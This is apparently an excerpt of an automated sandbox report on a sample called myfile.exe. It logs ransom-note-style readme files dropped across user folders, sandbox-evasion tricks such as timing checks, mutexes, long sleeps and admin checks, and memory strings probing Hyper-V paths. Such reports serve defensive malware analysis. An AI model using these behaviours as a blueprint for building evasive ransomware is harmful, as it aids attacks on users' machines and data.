            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\saved games\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\searches\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\videos\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\public\accountpictures\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\public\desktop\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\public\documents\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\public\downloads\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\public\libraries\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\public\music\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\public\pictures\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\public\videos\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\dtbzgiooso\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\dvwhkmnfnn\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\htagvdfuie\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\jsdngycowy\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\nikhqaiqau\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\onbqclyspu\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\sqrkhnbnyn\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\wkxewiotxi\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\xzxhavgrag\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\dtbzgiooso\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\dvwhkmnfnn\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\htagvdfuie\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\jsdngycowy\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\nikhqaiqau\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\onbqclyspu\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\sqrkhnbnyn\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\wkxewiotxi\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\xzxhavgrag\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\favorites\links\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\pictures\camera roll\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\pictures\saved pictures\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_00274B550_2_00274B55
            Source: C:\Users\user\Desktop\myfile.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-3544
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_00274AAB rdtsc 0_2_00274AAB
            Source: C:\Users\user\Desktop\myfile.exeWindow / User API: threadDelayed 10000Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-3783
            Source: C:\Users\user\Desktop\myfile.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-3768
            Source: C:\Users\user\Desktop\myfile.exe TID: 6248Thread sleep count: 10000 > 30Jump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\myfile.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_00276299 FindFirstFileW,FindNextFileW,FindClose,0_2_00276299
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_00272F5E GetSystemInfo,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,UnmapViewOfFile,DeleteFileW,0_2_00272F5E
            Source: C:\Users\user\Desktop\myfile.exeFile opened: C:\Windows\WinSxS\Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..m-service.resources_31bf3856ad364e35_10.0.19041.1865_en-us_b6d4cf229ed6dfa6.manifestJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3_hidserv.dll.mui_561adfc8Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: C:\Windows\WinSxS\Backup\Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: C:\Windows\WinSxS\Backup\amd64_microsoft-client-li..keyhelper.resources_31bf3856ad364e35_10.0.19041.1_en-us_a9723a608a71b1eb.manifestJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile opened: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3.manifestJump to behavior
            Source: myfile.exe, 00000000.00000003.1935549106.0000000002CAD000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3856ad364e35_10.0.19041.1_none_a2ace16370124ff4\[?I!
            Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.19041.1741_none_4fe99c993cb84326\r\
            Source: myfile.exe, 00000000.00000003.2025040226.0000000004331000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2009215768.0000000004331000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7\f\
            Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\f\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b\2
            Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.19041.1_none_34b87765e20dcc15\
            Source: myfile.exe, 00000000.00000003.1987570223.0000000004379000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1999993146.000000000438B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b\f\rL
            Source: myfile.exe, 00000000.00000003.2021609886.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2895277692.00000000042E8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029609937.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2019171990.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029336051.00000000042E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-driverlq
            Source: myfile.exe, 00000000.00000003.1987570223.0000000004379000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79\f\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.19041.1_none_43a9017744e82ca8\/
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_ddaeabc80a3525d6\/
            Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-lun-parser_31bf3856ad364e35_10.0.19041.1_none_b6d8bfc73f89cc96\
            Source: myfile.exe, 00000000.00000003.1980534561.0000000002BF3000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1942504657.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981082622.0000000002C0C000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1988873951.0000000002C17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\f\
            Source: myfile.exe, 00000000.00000003.2382483791.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2468286003.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2894114349.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2503677440.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2600172847.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2365373242.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2839219206.0000000001023000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2354497266.0000000001023000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW\*lient
            Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.19041.1741_none_b62736d427ac1a0c\f\D
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-clients.resources_31bf3856ad364e35_10.0.19041.1_en-us_a3e0d97c4c052586\o
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.19041.1889_none_46e4953b6f70cc79\
            Source: myfile.exe, 00000000.00000003.1941819772.0000000003153000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\
            Source: myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1987597314.0000000004347000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.19041.928_none_d35bf07ab5380c24\f\
            Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.19041.746_none_6fbcad1699b89a67\f\
            Source: myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1987597314.0000000004347000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41b\f\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..izationv2.resources_31bf3856ad364e35_10.0.19041.1_en-gb_7788797720472f2d\
            Source: myfile.exe, 00000000.00000003.2021609886.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000002.2895277692.00000000042E8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029609937.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2019171990.00000000042B9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2029336051.00000000042E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: indows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\f\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\
            Source: myfile.exe, 00000000.00000003.1935549106.0000000002CAD000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc239a85e2\
            Source: myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1987597314.0000000004347000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc239a85e2\r\
            Source: myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\{
            Source: myfile.exe, 00000000.00000003.2025040226.0000000004331000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2009215768.0000000004331000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.19041.2006_none_ab6b7b2814133920\r\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.19041.1741_none_b62736d427ac1a0c\w
            Source: myfile.exe, 00000000.00000003.1981576898.0000000002BFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\n
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug.resources_31bf3856ad364e35_10.0.19041.1_en-us_5ee8ada67d246bda\
            Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-debug_31bf3856ad364e35_10.0.19041.1741_none_78a9b11b7a3cc41b\
            Source: myfile.exe, 00000000.00000003.1987570223.0000000004379000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141\f\wd
            Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-passthru-parser_31bf3856ad364e35_10.0.19041.1_none_d7dfb451bd621127\!
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..ypervisor.resources_31bf3856ad364e35_10.0.19041.1_en-us_c2edb07518552135\
            Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66\
            Source: myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935066168.0000000002CA9000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1935089333.0000000002CB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-ram-parser_31bf3856ad364e35_10.0.19041.1_none_a7bb53746630ebd3\
            Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\r\zq
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid.resources_31bf3856ad364e35_10.0.19041.1_en-us_447494df1222bcd8\
            Source: myfile.exe, 00000000.00000003.2025040226.0000000004331000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981406776.000000000432B000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2009215768.0000000004331000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda\r\3
            Source: myfile.exe, 00000000.00000003.1996350688.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1981433036.0000000004299000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996099822.000000000429F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1996308203.00000000042A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-integration-rdv-core_31bf3856ad364e35_10.0.19041.964_none_3542494c595902f8\r\:v
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp.resources_31bf3856ad364e35_10.0.19041.1_en-us_369e8b635061fdb3\
            Source: myfile.exe, 00000000.00000003.1934867193.0000000002CB8000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934664389.0000000002C5F000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934797427.0000000002C83000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.1934834148.0000000002C8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\C:\Windows\WinSxS\amd64_microsoft-hyper-v-v..ck-virtualizationv2_31bf3856ad364e35_10.0.19041.1_none_25a2ff96aac272dd\BBW
